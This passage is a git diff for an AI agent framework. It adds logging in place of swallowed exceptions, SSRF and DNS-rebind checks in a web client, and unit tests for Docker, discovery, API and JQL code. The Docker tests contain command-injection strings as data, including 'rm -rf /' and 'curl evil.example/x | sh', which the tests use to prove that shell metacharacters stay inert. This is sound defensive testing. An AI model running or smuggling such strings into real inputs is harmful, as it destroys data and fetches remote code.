diff --git a/src/gaia/agents/base/agent.py b/src/gaia/agents/base/agent.py index 1f2b4be71..44876954e 100644 --- a/src/gaia/agents/base/agent.py +++ b/src/gaia/agents/base/agent.py @@ -435,8 +435,14 @@ def _get_mixin_prompts(self) -> list[str]: fragment = getattr(self, attr_name)() if fragment: prompts.append(fragment) - except Exception: - pass + except Exception as e: + # A raising fragment is dropped from the composed prompt; surface it + # so a silently degraded system prompt is diagnosable. + logger.warning( + "system-prompt fragment %s() raised, skipping it: %s", + attr_name, + e, + ) return prompts diff --git a/src/gaia/agents/base/memory.py b/src/gaia/agents/base/memory.py index 81f333ee2..927549784 100644 --- a/src/gaia/agents/base/memory.py +++ b/src/gaia/agents/base/memory.py @@ -62,8 +62,10 @@ def _load_memory_settings() -> Dict: try: if _MEMORY_SETTINGS_PATH.exists(): return json.loads(_MEMORY_SETTINGS_PATH.read_text(encoding="utf-8")) - except Exception: - pass + except (OSError, json.JSONDecodeError) as e: + logger.warning( + "failed to load memory settings from %s: %s", _MEMORY_SETTINGS_PATH, e + ) return {} diff --git a/src/gaia/mcp/mcp_bridge.py b/src/gaia/mcp/mcp_bridge.py index 88223d157..2c76eca78 100644 --- a/src/gaia/mcp/mcp_bridge.py +++ b/src/gaia/mcp/mcp_bridge.py @@ -60,8 +60,8 @@ def _parse_cd(self, value: str): name = p.split("=", 1)[1].strip().strip('"') elif pl.startswith("filename="): filename = p.split("=", 1)[1].strip().strip('"') - except Exception: - pass + except (AttributeError, IndexError, ValueError) as e: + logger.debug("Failed to parse Content-Disposition %r: %s", value, e) return name, filename def on_part_begin(self): diff --git a/src/gaia/messaging/telegram.py b/src/gaia/messaging/telegram.py index 92d80cee1..3e78255cf 100644 --- a/src/gaia/messaging/telegram.py +++ b/src/gaia/messaging/telegram.py @@ -184,7 +184,12 @@ def start(self, token: str, background: bool = False) -> None: with open(pid_path, "w", 
encoding="utf-8") as f: f.write(str(os.getpid())) except OSError as e: - log.exception("Failed to write PID file for telegram adapter: %s", e) + # The PID file is load-bearing in background mode: without it a + # supervisor cannot find or kill the process. Fail loudly. + raise RuntimeError( + f"Failed to write telegram PID file at {pid_path}: {e}. " + f"Ensure ~/.gaia is writable, or start without --background." + ) from e log_path = os.path.join(pid_dir, "telegram.log") try: diff --git a/src/gaia/rag/sdk.py b/src/gaia/rag/sdk.py index 5accbdd53..aa06df38f 100644 --- a/src/gaia/rag/sdk.py +++ b/src/gaia/rag/sdk.py @@ -449,8 +449,8 @@ def _load_embedder(self): # Force fresh load - must unload first try: self.llm_client.unload_model() - except Exception: - pass # Ignore if nothing to unload + except Exception as e: + self.log.warning("unload_model failed (continuing): %s", e) try: self.llm_client.load_model( diff --git a/src/gaia/web/client.py b/src/gaia/web/client.py index efd7bd609..b55299d71 100644 --- a/src/gaia/web/client.py +++ b/src/gaia/web/client.py @@ -40,6 +40,42 @@ ALLOWED_SCHEMES = {"http", "https"} BLOCKED_PORTS = {22, 23, 25, 445, 3306, 5432, 6379, 27017} + +def _is_blocked_ip(ip: "ipaddress._BaseAddress") -> bool: + """Return True if ``ip`` points at a private/internal range we must not fetch.""" + return ( + ip.is_private + or ip.is_loopback + or ip.is_link_local + or ip.is_reserved + or ip.is_multicast + ) + + +def _assert_ip_allowed(ip_str: str, hostname: str) -> None: + """Raise ValueError if ``ip_str`` is unparseable or a private/reserved IP. + + Connect-time guard: ``PinnedIPAdapter`` calls this on the IP it is about + to dial. It applies the same ``_is_blocked_ip`` predicate as the + pre-flight DNS check (``_validate_host_ip``, which calls the predicate + directly), so a DNS rebind that slips a private IP past the pre-flight + lookup is still caught at connect time on the *exact* address dialed. 
+ """ + try: + ip = ipaddress.ip_address(ip_str) + except ValueError: + # Not parseable as an IP — treat as unsafe rather than letting an + # unvalidated value reach the socket layer (fail loudly). + raise ValueError( + f"Blocked: {hostname} resolved to unparseable address {ip_str!r}." + ) + if _is_blocked_ip(ip): + raise ValueError( + f"Blocked: {hostname} resolves to private/reserved IP {ip}. " + "Cannot fetch internal network addresses." + ) + + # Tags to remove during text extraction REMOVE_TAGS = [ "script", @@ -72,12 +108,35 @@ class PinnedIPAdapter(HTTPAdapter): DNS-rebind attacks between ``WebClient.validate_url`` and the actual TCP connect. + Crucially, the pinned IP is itself validated (``_assert_ip_allowed``) + before it is cached or connected to. ``validate_url`` runs a *separate* + pre-flight ``getaddrinfo``; an attacker controlling DNS could answer that + lookup with a public IP and answer the adapter's lookup with a private + one. Validating the exact address the adapter is about to dial closes + that residual rebind window for BOTH http and https. + For HTTPS, the original hostname is encoded in the URL's userinfo section (``originalhostname@pinnedip:port``) so that urllib3 creates separate connection-pool keys per original hostname. This avoids a race where two threads requesting different hostnames that resolve to the same IP would overwrite each other's ``assert_hostname`` on a shared pool. + + Residual HTTPS limitation (documented, not silently ignored): + Because ``requests`` derives the urllib3 pool host — and therefore the + TLS SNI ``server_hostname`` — from the request URL's hostname (which we + rewrote to the pinned IP), the ClientHello SNI is sent as the IP, not the + original hostname. 
``assert_hostname`` still forces certificate-name + verification against the real hostname (so verification is NOT disabled + and we never trust a cert for the bare IP), but servers that rely on SNI + for virtual hosting (most CDNs / shared hosts) may return the wrong + certificate or reject the handshake, surfacing as a TLS error rather than + a silent downgrade. This affects whether legitimate HTTPS *succeeds* — it + does not weaken the SSRF block, which fires on the validated IP before any + bytes are sent. Fixing SNI cleanly requires a custom urllib3 + ``PoolManager``/``HTTPSConnection`` that decouples ``server_hostname`` + from the connect address; that is intentionally out of scope here in + favour of a correct, narrower guarantee. """ def __init__(self, *args, **kwargs): @@ -94,6 +153,12 @@ def _resolve_first_ip(self, host: str, port: int) -> str: raise OSError(f"getaddrinfo returned no addresses for {host}:{port}") ip = infos[0][4][0] # sockaddr[0] of the first result + # Validate the EXACT IP we are about to pin & connect to. validate_url + # did a pre-flight getaddrinfo, but that was a separate lookup — a DNS + # rebind could hand validate_url a public IP and hand us a private one. + # Re-check here so the address actually dialed is always safe; cache + # only after it passes so a poisoned answer is never reused. + _assert_ip_allowed(ip, host) self._pinned_cache[key] = ip return ip @@ -134,7 +199,22 @@ def send(self, request: requests.PreparedRequest, **kwargs) -> requests.Response pinned_ip = self._resolve_first_ip(host, port) if parsed.scheme == "https": - # Encode original hostname in userinfo for unique pool keys + # Encode original hostname in userinfo for unique pool keys. + # See class docstring: SNI is sent as the pinned IP, so + # SNI-vhosted servers may fail the handshake. Cert-name + # verification still binds to the real hostname. 
+ if not getattr(self, "_warned_https_sni", False): + log.warning( + "PinnedIPAdapter: HTTPS request to %s is pinned to %s; " + "TLS SNI will be sent as the IP. Servers using " + "SNI-based virtual hosting may return the wrong " + "certificate or reject the handshake. Certificate-name " + "verification still validates against %s.", + host, + pinned_ip, + host, + ) + self._warned_https_sni = True new_netloc = f"{host}@{pinned_ip}:{port}" else: new_netloc = f"{pinned_ip}:{port}" @@ -270,13 +350,7 @@ def _validate_host_ip(self, hostname: str) -> None: except ValueError: continue - if ( - ip.is_private - or ip.is_loopback - or ip.is_link_local - or ip.is_reserved - or ip.is_multicast - ): + if _is_blocked_ip(ip): raise ValueError( f"Blocked: {hostname} resolves to private/reserved IP {ip}. " "Cannot fetch internal network addresses." diff --git a/tests/test_api.py b/tests/test_api.py index c27fb8002..8bc7e2309 100644 --- a/tests/test_api.py +++ b/tests/test_api.py @@ -54,6 +54,95 @@ def setup(self): pytest.skip(f"API dependencies not available: {IMPORT_ERROR}") self.client = TestClient(app) + # ------------------------------------------------------------------------- + # Non-streaming happy path (mocked agent backend — no Lemonade required) + # ------------------------------------------------------------------------- + + def test_basic_completion_with_mocked_agent(self, mocker): + """Non-streaming POST returns a schema-valid OpenAI completion. + + The agent/Lemonade backend is mocked: registry.get_agent yields a stub + whose process_query returns a canned result dict, so the handler's + non-streaming branch runs end-to-end without a live LLM server. + """ + # Stub agent: NOT an ApiAgent, so the handler uses the len//4 token + # estimate path (deterministic, no tokenizer needed). 
+ fake_agent = mocker.MagicMock() + fake_agent.process_query.return_value = { + "status": "success", + "result": "def hello():\n return 'hello world'", + } + + from gaia.api.openai_server import registry as server_registry + + mocker.patch.object(server_registry, "get_agent", return_value=fake_agent) + + payload = { + "model": "gaia-code", + "messages": [ + {"role": "user", "content": "Write a hello world function in Python"} + ], + "stream": False, + } + response = self.client.post("/v1/chat/completions", json=payload) + + assert response.status_code == 200, response.text + data = response.json() + + # Top-level OpenAI-compatible structure. + assert data["object"] == "chat.completion" + assert data["id"].startswith("chatcmpl-") + assert isinstance(data["created"], int) + assert data["model"] == "gaia-code" + + # The agent was invoked with the extracted user message. + fake_agent.process_query.assert_called_once() + call_args, _ = fake_agent.process_query.call_args + assert call_args[0] == "Write a hello world function in Python" + + # Choices. + assert len(data["choices"]) == 1 + choice = data["choices"][0] + assert choice["index"] == 0 + assert choice["message"]["role"] == "assistant" + assert choice["message"]["content"] == ( + "def hello():\n return 'hello world'" + ) + assert choice["finish_reason"] == "stop" + + # Usage accounting. 
+ usage = data["usage"] + assert usage["prompt_tokens"] > 0 + assert usage["completion_tokens"] > 0 + assert usage["total_tokens"] == ( + usage["prompt_tokens"] + usage["completion_tokens"] + ) + + def test_completion_uses_last_user_message(self, mocker): + """The handler passes the LAST user message (not system/assistant) to the agent.""" + fake_agent = mocker.MagicMock() + fake_agent.process_query.return_value = {"result": "ok"} + + from gaia.api.openai_server import registry as server_registry + + mocker.patch.object(server_registry, "get_agent", return_value=fake_agent) + + payload = { + "model": "gaia-code", + "messages": [ + {"role": "system", "content": "You are helpful"}, + {"role": "user", "content": "first question"}, + {"role": "assistant", "content": "an earlier answer"}, + {"role": "user", "content": "second question"}, + ], + "stream": False, + } + response = self.client.post("/v1/chat/completions", json=payload) + + assert response.status_code == 200, response.text + call_args, _ = fake_agent.process_query.call_args + assert call_args[0] == "second question" + # ------------------------------------------------------------------------- # Model Validation Tests # ------------------------------------------------------------------------- @@ -308,47 +397,6 @@ def test_422_error_has_detail_field(self): class TestChatCompletionsNonStreaming: """Test POST /v1/chat/completions without streaming""" - @pytest.mark.skip(reason="Skipped: API server returns 500 - see issue for fix") - def test_basic_completion_with_code_agent(self, api_server, api_client): - """Test that gaia-code returns valid OpenAI-compatible completion""" - payload = { - "model": "gaia-code", - "messages": [ - {"role": "user", "content": "Write a hello world function in Python"} - ], - "stream": False, - } - response = api_client.post(f"{api_server}/v1/chat/completions", json=payload) - - assert response.status_code == 200 - data = response.json() - - # Verify OpenAI-compatible structure - 
assert data["object"] == "chat.completion" - assert "id" in data - assert data["id"].startswith("chatcmpl-") - assert "created" in data - assert isinstance(data["created"], int) - assert data["model"] == "gaia-code" - - # Verify choices - assert "choices" in data - assert len(data["choices"]) == 1 - choice = data["choices"][0] - assert choice["index"] == 0 - assert choice["message"]["role"] == "assistant" - assert isinstance(choice["message"]["content"], str) - assert len(choice["message"]["content"]) > 0 - assert choice["finish_reason"] in ["stop", "length"] - - # Verify token usage - assert "usage" in data - assert data["usage"]["prompt_tokens"] > 0 - assert data["usage"]["completion_tokens"] > 0 - assert data["usage"]["total_tokens"] == ( - data["usage"]["prompt_tokens"] + data["usage"]["completion_tokens"] - ) - def test_invalid_model_returns_404(self, api_server, api_client): """Test that invalid model returns 404 error""" payload = { diff --git a/tests/unit/agents/test_discovery.py b/tests/unit/agents/test_discovery.py new file mode 100644 index 000000000..330051d10 --- /dev/null +++ b/tests/unit/agents/test_discovery.py @@ -0,0 +1,344 @@ +# Copyright(C) 2025-2026 Advanced Micro Devices, Inc. All rights reserved. +# SPDX-License-Identifier: MIT +"""Hermetic unit tests for SystemDiscovery pure classification helpers. + +These tests exercise only the pure/classifier helpers and the directory-walk +skip logic. No real scan of the user's home directory, no network, no git, no +account data — all filesystem inputs are crafted under ``tmp_path`` and the +home directory is redirected to an isolated temp dir. 
+""" + +from pathlib import Path + +import pytest + +from gaia.agents.base.discovery import ( + SystemDiscovery, + _categorize_app, + _classify_domain, + _classify_path, + _classify_project, + _classify_remote, + _detect_languages, + _extract_domain, + _is_hidden, +) + +# --------------------------------------------------------------------------- +# _is_hidden +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "name,expected", + [ + (".git", True), + (".ssh", True), + ("Projects", False), + ("node_modules", False), # skip-listed but not "hidden" by dot rule + ("", False), + ], +) +def test_is_hidden(name, expected): + assert _is_hidden(name) is expected + + +# --------------------------------------------------------------------------- +# _classify_path — location-based context +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "parts,expected", + [ + (("home", "user", "Work", "repo"), "work"), + (("home", "user", "Projects", "repo"), "work"), + (("home", "user", "Personal", "stuff"), "personal"), + (("home", "user", "Documents", "thing"), "unclassified"), + (("home", "user", "random"), "unclassified"), + ], +) +def test_classify_path(parts, expected): + # _classify_path lowercases parts, so casing is irrelevant. 
+ assert _classify_path(Path(*parts)) == expected + + +def test_classify_path_is_case_insensitive(): + assert _classify_path(Path("/home/user/WORK/repo")) == "work" + assert _classify_path(Path("/home/user/PERSONAL/x")) == "personal" + + +# --------------------------------------------------------------------------- +# _classify_remote — git remote URL context (hostname-parsed, no spoofing) +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "url,expected", + [ + ("https://github.com/amd/gaia.git", "work"), + ("https://github.com/microsoft/vscode", "work"), + ("https://github.com/google/jax", "work"), + ("https://github.com/someuser/sideproject", "unclassified"), + ("https://gitlab.com/someuser/thing", "unclassified"), + ("", "unclassified"), + ], +) +def test_classify_remote(url, expected): + assert _classify_remote(url) == expected + + +def test_classify_remote_does_not_spoof_via_hostname(): + # A URL on another host that merely contains "github.com" in its *path* + # must NOT be treated as github.com — classification stays unclassified. 
+ assert _classify_remote("https://evil.example/github.com/amd") == "unclassified" + + +# --------------------------------------------------------------------------- +# _classify_domain — bookmark/history domain context +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "domain,expected", + [ + ("github.com", "work"), + ("stackoverflow.com", "work"), + ("facebook.com", "personal"), + ("netflix.com", "personal"), + ("example.com", "unclassified"), + ("GitHub.com", "work"), # case-insensitive + ], +) +def test_classify_domain(domain, expected): + assert _classify_domain(domain) == expected + + +# --------------------------------------------------------------------------- +# _extract_domain — URL -> bare domain +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "url,expected", + [ + ("https://www.github.com/amd/gaia", "github.com"), + ("http://example.com:8080/path?q=1#frag", "example.com"), + ("https://Sub.Example.COM/x", "sub.example.com"), + ("ftp://files.example.org/a/b", "files.example.org"), + (" https://github.com/x ", "github.com"), + ], +) +def test_extract_domain(url, expected): + assert _extract_domain(url) == expected + + +# --------------------------------------------------------------------------- +# _categorize_app — keyword-based app categorization +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "app_name,expected", + [ + ("Visual Studio Code", "IDE"), + ("PyCharm Community Edition", "IDE"), + ("Docker Desktop", "DevTool"), + ("Google Chrome", "Browser"), + ("Slack", "Communication"), + ("Blender", "Creative"), + ("Notion", "Productivity"), + ("Some Totally Unknown App", "Other"), + ], +) +def test_categorize_app(app_name, expected): + assert _categorize_app(app_name) == expected + + +def test_categorize_app_first_keyword_match_wins(): + # Documents current behavior: 
matching is first-category-wins by substring, + # so "Obsidian" matches the Creative keyword "obs" (OBS) before reaching the + # Productivity list. Guards against silent reordering of _APP_CATEGORIES. + assert _categorize_app("Obsidian") == "Creative" + + +# --------------------------------------------------------------------------- +# _detect_languages — extension counting with hidden/skip-dir exclusion +# --------------------------------------------------------------------------- + + +def test_detect_languages_counts_and_sorts(tmp_path): + (tmp_path / "a.py").write_text("x = 1\n") + (tmp_path / "b.py").write_text("y = 2\n") + (tmp_path / "c.ts").write_text("const z = 3\n") + langs = _detect_languages(tmp_path, max_depth=2) + # Python (2 files) should outrank TypeScript (1 file). + assert langs[0] == "Python" + assert "TypeScript" in langs + + +def test_detect_languages_skips_hidden_and_skip_dirs(tmp_path): + # A real source file at the top level. + (tmp_path / "main.py").write_text("print('hi')\n") + # Files inside skip-listed / hidden dirs must NOT be counted. + nm = tmp_path / "node_modules" + nm.mkdir() + (nm / "dep.js").write_text("module.exports = {}\n") + venv = tmp_path / ".venv" + venv.mkdir() + (venv / "lib.py").write_text("# vendored\n") + hidden = tmp_path / ".secret" + hidden.mkdir() + (hidden / "leak.rs").write_text("fn main() {}\n") + + langs = _detect_languages(tmp_path, max_depth=2) + assert langs == ["Python"] + # JavaScript/Rust came only from excluded dirs, so they must be absent. + assert "JavaScript" not in langs + assert "Rust" not in langs + + +def test_detect_languages_ignores_doc_and_markup_extensions(tmp_path): + (tmp_path / "README.md").write_text("# doc\n") + (tmp_path / "page.html").write_text("\n") + (tmp_path / "style.css").write_text("body{}\n") + # No "real" code language present -> empty result. 
+ assert _detect_languages(tmp_path, max_depth=2) == [] + + +# --------------------------------------------------------------------------- +# _classify_project — marker/language based project classification +# --------------------------------------------------------------------------- + + +def test_classify_project_detects_python_package(tmp_path): + (tmp_path / "pyproject.toml").write_text("[project]\nname='x'\n") + assert _classify_project(tmp_path, ["Python"]) == "Python package" + + +def test_classify_project_detects_node_project(tmp_path): + (tmp_path / "package.json").write_text("{}\n") + assert _classify_project(tmp_path, ["JavaScript"]) == "Node.js project" + + +def test_classify_project_falls_back_to_language(tmp_path): + # No markers -> language-based classification. + assert _classify_project(tmp_path, ["Rust"]) == "Rust codebase" + + +def test_classify_project_empty_when_nothing_known(tmp_path): + assert _classify_project(tmp_path, []) == "" + + +# --------------------------------------------------------------------------- +# Directory-walk skip logic — scan_file_system / scan_git_repos must NOT emit +# hidden or skip-listed directories as discovered facts. +# --------------------------------------------------------------------------- + + +@pytest.fixture +def isolated_discovery(tmp_path, monkeypatch): + """SystemDiscovery whose home points at an empty isolated temp dir. + + Guards against any accidental scan of the real user home directory. + """ + fake_home = tmp_path / "fake_home" + fake_home.mkdir() + monkeypatch.setattr(Path, "home", staticmethod(lambda: fake_home)) + return SystemDiscovery() + + +def test_scan_file_system_excludes_hidden_and_skip_dirs(isolated_discovery, tmp_path): + work = tmp_path / "Work" + work.mkdir() + + # A legitimate project directory with code. + real = work / "myproject" + real.mkdir() + (real / "app.py").write_text("print('hi')\n") + + # Hidden directory — private, must NOT be emitted as a discovered project. 
+ hidden = work / ".private" + hidden.mkdir() + (hidden / "secret.py").write_text("password = 'x'\n") + + # Skip-listed directory — must NOT be emitted as a project either. + nm = work / "node_modules" + nm.mkdir() + (nm / "index.js").write_text("module.exports = {}\n") + + facts = isolated_discovery.scan_file_system(paths=[work]) + + project_facts = [f for f in facts if f.get("file_type") == "project"] + emitted_names = {f["path"] for f in project_facts} + + assert str(real) in emitted_names + assert str(hidden) not in emitted_names + assert str(nm) not in emitted_names + # No fact should reference the private/system directory in its content. + for f in facts: + assert ".private" not in f["content"] + assert "node_modules" not in f["content"] + + +def test_scan_file_system_skips_missing_paths(isolated_discovery, tmp_path): + # Nonexistent override path -> no crash, empty result. + assert isolated_discovery.scan_file_system(paths=[tmp_path / "nope"]) == [] + + +def test_scan_git_repos_excludes_hidden_dirs(isolated_discovery, tmp_path): + work = tmp_path / "Work" + work.mkdir() + + # A real git repo (minimal .git with config + HEAD). + repo = work / "realrepo" + repo.mkdir() + git_dir = repo / ".git" + git_dir.mkdir() + (git_dir / "config").write_text( + '[remote "origin"]\n\turl = https://github.com/someuser/realrepo.git\n' + ) + (git_dir / "HEAD").write_text("ref: refs/heads/main\n") + (repo / "lib.py").write_text("x = 1\n") + + # A hidden directory that itself contains a git repo — the walk skips hidden + # dirs, so this private repo must NOT surface as a discovered fact. 
+ hidden_parent = work / ".hidden" + hidden_parent.mkdir() + hidden_repo = hidden_parent / "privaterepo" + hidden_repo.mkdir() + hgit = hidden_repo / ".git" + hgit.mkdir() + (hgit / "config").write_text( + '[remote "origin"]\n\turl = https://github.com/secret/privaterepo.git\n' + ) + (hgit / "HEAD").write_text("ref: refs/heads/main\n") + + facts = isolated_discovery.scan_git_repos(paths=[work]) + contents = " ".join(f["content"] for f in facts) + + assert "realrepo" in contents + assert "privaterepo" not in contents + assert "secret" not in contents + + +def test_scan_git_repos_parses_remote_and_branch(isolated_discovery, tmp_path): + work = tmp_path / "Work" + work.mkdir() + repo = work / "gaia" + repo.mkdir() + git_dir = repo / ".git" + git_dir.mkdir() + (git_dir / "config").write_text( + '[remote "origin"]\n\turl = https://github.com/amd/gaia.git\n' + ) + (git_dir / "HEAD").write_text("ref: refs/heads/develop\n") + + facts = isolated_discovery.scan_git_repos(paths=[work]) + assert len(facts) == 1 + fact = facts[0] + assert "gaia" in fact["content"] + assert "github.com/amd/gaia.git" in fact["content"] + assert "branch: develop" in fact["content"] + # Remote points at /amd/ -> classified as work context. + assert fact["context"] == "work" diff --git a/tests/unit/agents/test_docker_agent.py b/tests/unit/agents/test_docker_agent.py new file mode 100644 index 000000000..33294ee70 --- /dev/null +++ b/tests/unit/agents/test_docker_agent.py @@ -0,0 +1,255 @@ +# Copyright(C) 2025-2026 Advanced Micro Devices, Inc. All rights reserved. +# SPDX-License-Identifier: MIT +"""Unit tests for DockerAgent's subprocess-invoking tools. + +These tests exercise the real tool implementations (``_build_image``, +``_run_container``, ``_save_dockerfile``) with ``subprocess.run`` patched so no +real Docker daemon is contacted. 
They assert: + +- the exact argv list passed to subprocess for build/run, +- that Dockerfiles are written to disk by save_dockerfile, +- the PathValidator allowlist rejects build/save paths outside the allowed + directory WITHOUT invoking subprocess, +- subprocess is always called with a list argv and never ``shell=True`` (so an + attacker-controlled tag or image name cannot inject extra shell tokens). + +The agent constructs fully offline — the base Agent's LLM client is lazy and is +not contacted during these tool calls — so no Lemonade/LLM mock is required for +the tool paths. We still keep construction in a fixture so a future eager-init +change surfaces here rather than silently in CI. +""" + +from __future__ import annotations + +from unittest.mock import MagicMock, patch + +import pytest + +from gaia.agents.docker.agent import DockerAgent + +DOCKER_MODULE = "gaia.agents.docker.agent.subprocess.run" + + +def _completed(returncode: int = 0, stdout: str = "", stderr: str = ""): + """Build a stand-in for subprocess.CompletedProcess.""" + proc = MagicMock() + proc.returncode = returncode + proc.stdout = stdout + proc.stderr = stderr + return proc + + +@pytest.fixture +def agent(tmp_path): + """DockerAgent whose allowlist is restricted to a single tmp directory. + + Restricting allowed_paths to tmp_path means any path outside it is + rejected by PathValidator, which lets us assert the security boundary + deterministically (and in a non-interactive test process the validator + auto-denies rather than prompting). 
+ """ + return DockerAgent(silent_mode=True, allowed_paths=[str(tmp_path)]) + + +# --------------------------------------------------------------------------- +# build_image — argv and success/failure handling +# --------------------------------------------------------------------------- + + +class TestBuildImage: + def test_invokes_docker_build_with_expected_argv(self, agent, tmp_path): + # First subprocess.run is the `docker --version` probe, second is build. + with patch(DOCKER_MODULE) as run: + run.side_effect = [ + _completed(returncode=0, stdout="Docker version 27.0"), + _completed(returncode=0, stdout="built"), + ] + result = agent._build_image(str(tmp_path), "myapp:1.2.3") + + assert result["status"] == "success" + assert result["image"] == "myapp:1.2.3" + + # Two calls: version probe, then the build. + assert run.call_count == 2 + version_call, build_call = run.call_args_list + + assert version_call.args[0] == ["docker", "--version"] + assert build_call.args[0] == [ + "docker", + "build", + "-t", + "myapp:1.2.3", + str(tmp_path), + ] + + def test_build_failure_surfaces_stderr(self, agent, tmp_path): + with patch(DOCKER_MODULE) as run: + run.side_effect = [ + _completed(returncode=0, stdout="Docker version 27.0"), + _completed(returncode=1, stderr="no such file"), + ] + result = agent._build_image(str(tmp_path), "app:latest") + + assert result["status"] == "error" + assert result["success"] is False + assert "no such file" in result["error"] + + def test_docker_not_installed_short_circuits_before_build(self, agent, tmp_path): + # Version probe returns non-zero -> build must never run. + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=127) + result = agent._build_image(str(tmp_path), "app:latest") + + assert result["status"] == "error" + assert "Docker is not installed" in result["error"] + # Only the version probe ran; the build argv was never reached. 
+ assert run.call_count == 1 + assert run.call_args.args[0] == ["docker", "--version"] + + +# --------------------------------------------------------------------------- +# run_container — argv assembly +# --------------------------------------------------------------------------- + + +class TestRunContainer: + def test_basic_run_argv(self, agent): + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=0, stdout="abcdef123456\n") + result = agent._run_container("app:latest") + + assert result["status"] == "success" + assert result["container_id"] == "abcdef123456" + run.assert_called_once() + assert run.call_args.args[0] == ["docker", "run", "-d", "app:latest"] + + def test_run_with_port_and_name_argv(self, agent): + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=0, stdout="deadbeefcafe\n") + result = agent._run_container("app:latest", port="5000:5000", name="myctr") + + assert result["status"] == "success" + assert result["url"] == "http://localhost:5000" + assert run.call_args.args[0] == [ + "docker", + "run", + "-d", + "-p", + "5000:5000", + "--name", + "myctr", + "app:latest", + ] + + def test_run_failure_surfaces_stderr(self, agent): + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=1, stderr="image not found") + result = agent._run_container("nope:latest") + + assert result["status"] == "error" + assert result["success"] is False + assert "image not found" in result["error"] + + +# --------------------------------------------------------------------------- +# save_dockerfile — writes file, honours allowlist +# --------------------------------------------------------------------------- + + +class TestSaveDockerfile: + def test_writes_dockerfile_to_allowed_path(self, agent, tmp_path): + content = 'FROM python:3.9-slim\nCMD ["python", "app.py"]\n' + result = agent._save_dockerfile(content, str(tmp_path), 5000) + + assert result["status"] == "success" + written = tmp_path / 
"Dockerfile" + assert written.exists() + assert written.read_text(encoding="utf-8") == content + + def test_nonexistent_directory_errors(self, agent, tmp_path): + missing = tmp_path / "does_not_exist" + result = agent._save_dockerfile("FROM scratch", str(missing), 5000) + assert result["status"] == "error" + assert "does not exist" in result["error"] + + +# --------------------------------------------------------------------------- +# Security: allowlist boundary — outside paths rejected without subprocess +# --------------------------------------------------------------------------- + + +class TestPathAllowlist: + def test_build_outside_allowlist_rejected_no_subprocess(self, agent, tmp_path): + # /etc is outside the tmp_path allowlist. The validator runs in a + # non-interactive test process, so it auto-denies (no prompt). + with patch(DOCKER_MODULE) as run: + result = agent._build_image("/etc", "evil:latest") + + assert result["status"] == "error" + assert "Access denied" in result["error"] + # Critical: subprocess must NOT be invoked for a denied path. + run.assert_not_called() + + def test_save_outside_allowlist_rejected_no_write(self, agent, tmp_path): + target = "/etc/Dockerfile" + result = agent._save_dockerfile("FROM scratch", "/etc", 5000) + assert result["status"] == "error" + assert "Access denied" in result["error"] + # The denied path must not have been written. 
+ import os + + assert not os.path.exists(target) or "Access denied" in result["error"] + + def test_analyze_outside_allowlist_rejected(self, agent): + result = agent._analyze_directory("/etc") + assert result["status"] == "error" + assert "Access denied" in result["error"] + + +# --------------------------------------------------------------------------- +# Security: no shell injection surface — list argv, shell=True never used +# --------------------------------------------------------------------------- + + +class TestNoShellInjection: + def test_build_never_uses_shell_true(self, agent, tmp_path): + # A tag laced with shell metacharacters must be passed as a single + # argv element, never interpolated into a shell string. + malicious_tag = "app:latest; rm -rf / #" + with patch(DOCKER_MODULE) as run: + run.side_effect = [ + _completed(returncode=0, stdout="Docker version 27.0"), + _completed(returncode=0, stdout="built"), + ] + agent._build_image(str(tmp_path), malicious_tag) + + for call in run.call_args_list: + # argv is positional, passed as a list (not a shell string). + assert isinstance(call.args[0], list) + # shell=True must never appear in kwargs. + assert call.kwargs.get("shell", False) is False + + # The malicious tag stays a single, un-split argv token: the shell + # metacharacters are inert because no shell ever sees them. 
+ build_call = run.call_args_list[-1] + assert malicious_tag in build_call.args[0] + assert build_call.args[0] == [ + "docker", + "build", + "-t", + malicious_tag, + str(tmp_path), + ] + + def test_run_never_uses_shell_true(self, agent): + malicious_image = "app:latest && curl evil.example/x | sh" + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=0, stdout="abc123\n") + agent._run_container(malicious_image, port="$(whoami):80") + + call = run.call_args + assert isinstance(call.args[0], list) + assert call.kwargs.get("shell", False) is False + # Both attacker-controlled values land as single, opaque argv tokens. + assert malicious_image in call.args[0] + assert "$(whoami):80" in call.args[0] diff --git a/tests/unit/agents/test_jql_templates.py b/tests/unit/agents/test_jql_templates.py new file mode 100644 index 000000000..3556981b5 --- /dev/null +++ b/tests/unit/agents/test_jql_templates.py @@ -0,0 +1,251 @@ +# Copyright(C) 2025-2026 Advanced Micro Devices, Inc. All rights reserved. +# SPDX-License-Identifier: MIT +"""Unit tests for the JQL template builder (gaia.agents.jira.jql_templates). + +``generate_jql_from_templates`` turns natural language into a JQL string that is +later sent to Atlassian. Because part of the input is user-supplied free text, +the generated JQL is an injection surface. These tests verify both: + +1. Correct JQL construction for representative natural-language inputs, and +2. The defensive property that makes the builder safe: user-supplied values are + captured by *restrictive regex character classes* (e.g. ``[A-Z0-9]+`` for + project keys, an email-shaped class for assignees) rather than by escaping. + Anything outside that class terminates the capture, so quote / boolean + injection chars cannot leak into a value's quoting context. + +All tests are pure-function tests — no network, no Atlassian, no LLM. 
+""" + +from __future__ import annotations + +from gaia.agents.jira.jql_templates import ( + COMPOSITE_PATTERNS, + JQL_TEMPLATES, + LABEL_MAPPINGS, + ORDER_PATTERNS, + REGEX_PATTERNS, + TEAM_PATTERNS, + generate_jql_from_templates, +) + +ORDER_SUFFIX = " ORDER BY updated DESC" + + +# --------------------------------------------------------------------------- +# Default ordering and no-match fallback +# --------------------------------------------------------------------------- + + +class TestDefaults: + def test_unmatched_input_uses_default_query_and_order(self): + # No template, regex, label, or team matches -> documented default. + assert ( + generate_jql_from_templates("zzqqxx nonsense") + == "created >= -30d" + ORDER_SUFFIX + ) + + def test_default_order_appended_when_no_order_keyword(self): + out = generate_jql_from_templates("bugs") + assert out.endswith(ORDER_SUFFIX) + + def test_explicit_order_keyword_overrides_default(self): + out = generate_jql_from_templates("bugs newest") + assert out.endswith(" ORDER BY created DESC") + assert "updated DESC" not in out + + +# --------------------------------------------------------------------------- +# Simple template 